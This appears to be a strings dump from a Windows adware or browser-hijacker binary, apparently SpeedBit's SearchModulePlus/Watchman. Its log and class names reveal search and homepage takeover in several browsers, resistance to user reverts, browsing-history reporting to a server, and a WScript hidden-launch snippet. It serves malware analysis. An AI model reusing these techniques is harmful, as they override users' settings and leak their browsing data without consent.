suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

Need to send report!!!

ServerReporter::Create

Original report URL:

URL to use:

ServerReporter::SendInitialReport

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

ServerReporter::SendHistoryReport

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new<SendReportTask>

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask<SendReportTask>

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

UninstallReporter

profiles.ini

prefs.js

Mozilla\Firefox\

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::QueryProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

SHELL32.DLL

No profiles found! Maybe - first start of Firefox?

ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf<SHDeleteKeyW>

WKERNEL32.DLL

VERSION.DLL

NTDLL.DLL

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

ntdll.dll

Could not create memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

A[BrowserHistory::GetPropertyReport]

Found URL:

GIPHLPAPI.DLL

GX-hX-hX-XX-XXXXXX

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

IAction::QueryInterface<IExecAction>

IExecAction::put_Path

IExecAction::put_WorkingDirectory

IExecAction::put_Arguments

Ghttp\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

[SynchronousPipe::Write]

[SynchronousPipe::Read]

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Not enough memory. Size: %s (%s)

Error code: %u ('%s')

Could not allocate IPC memory. Requires size: %u

Could not create pipe. %%s

Could not create pipe event. %%s

Event error. %%s

Pipe connecting error. %%s

HCould not create IPC event. %%s

yIEXPLORE.EXE

SuggestionURL

FaviconURL

TopResultURLFallback

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Failed to call enum URL's. Error:

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build<ChromeSettings>]

[Monitor::RestoreData::Controller::Build<FirefoxSettings>]

[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]

[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]

new<ChromeSettings>

Injection::Snapshot::Parser::Parse<ChromeSettings>

new<FirefoxSettings>

Injection::Snapshot::Parser::Parse<FirefoxSettings>

ReadStringNode<AboutTabsUrl>

[Injection::Snapshot::Parser::Parse<ChromeSettings>]

ReadStringNode<DefaultProviderKeyword>

[Injection::Snapshot::Parser::Parse<FirefoxSettings>]

[Injection::Snapshot::Controller::IsChromeInstalled]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::Create

Chrome::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::General:

Argument.Config::User:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Create

MachineKey::Generate

[WatchmanKey::CleanupKey]

[WatchmanKey::LoadEncodedData]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::System::LoadGeneralConfig]

WatchmanKey::System::Open

WatchmanKey::LoadEncodedData

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::System::Ensure

WatchmanKey::SaveEncodedData

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::Users::Ensure]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Open]

WatchmanKey::OpenKey

[WatchmanKey::Users::LoadConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

smod.xml

SearchModulePlus.crx

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

DATAMNGR.DLL

IEBHO.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode<StartPageUrl>

lReadStringNode<AboutTabUrl>

ReadStringNode<SearchScopeUrl>

ReadStringNode<SearchScopeIconUrl>

ReadStringNode<SearchScopeSuggestUrl>

[Config::General::Parser::ParseChromeSettings]

MissedElement<GoogleChrome>

Config::General::Parser::ParseChromeValueSets

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode<HomePageUrl>

ReadStringNode<DefaultProviderSearchUrl>

ReadStringNode<DefaultProviderIconUrl>

ReadStringNode<DefaultProviderSuggestUrl>

[Config::General::Parser::ParseFirefoxSettings]

MissedElement<MozillaFirefox>

Config::General::Parser::ParseFirefoxValueSets

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode<HomePageUrl>

ReadOptionalStringNode<SearchPluginUrl>

ReadOptionalStringNode<SearchPluginSuggestionUrl>

[Config::General::Parser::ParseUrlSet]

MissedElement<UrlSet>

ReadStringNode<TabPageUrl>

ReadStringNode<SearchEngineFaviconUrl>

ReadStringNode<SearchEngineSuggestionUrl>

ReadStringNode<SearchEngineSearchUrl>

dReadStringNode<SearchEngineKeyword>

[Config::General::Parser::ParseOperaSettings]

MissedElement<Opera>

yReadStringNode<Key>

[Config::General::Builder::Build<ChromeSettinsg>]

[Config::General::Builder::Build<FirefoxSettinsg>]

[Config::General::Builder::Build<OperaSettinsg>]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

JReset-2.1.0.7

2.1.0.7

2.0.0.0

ReadOptionalStringNode<UrlSet>

ReadStringNode<UpdateUrl>

ReadStringNode<ReportUrl>

ReadBooleanNode<GoogleChrome>

ReadBooleanNode<MozillaFirefox>

ReadBooleanNode<Opera>

Could not find URL Set in configuration. Probably older configuration.

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildFirefoxSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

CChromeExtension::GetFileListInExtenstion

GCHROME.EXE

__MSG_

manifest.json

messages.json

WebData

[Chrome::BrowserInfo::Query]

Google\Chrome

\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\resources.pak

\Google\Chrome\Application\

\Web Data

[Chrome::BrowserSettings::OpenConfigFiles]

Chrome::InstallInfo::Get

SQLite::WebDataDB::Create

[Chrome::BrowserSettings::SetHomePagePreferences]

Argument.HomePageUrl:

Argument.HomePageIsNewTabPage:

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.DefaultProviderId:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderName:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSuggestUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.RestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

[Chrome::BrowserSettings::GetSearchProviderId]

Argument.KeywordToSearch:

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetProviderById

Result.ProviderId:

[Chrome::BrowserSettings::EnsureSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::DeleteSearchProvider]

Key deleted:

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::DeleteSearchProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderId]

Lchrome-extension://

13050095043000000

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking<extensions.settings>

Opera Software\Opera Stable\

\Opera\launcher.exe

\opera.pak

\Opera\

Web Data

\resources\default_partner_content.json

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

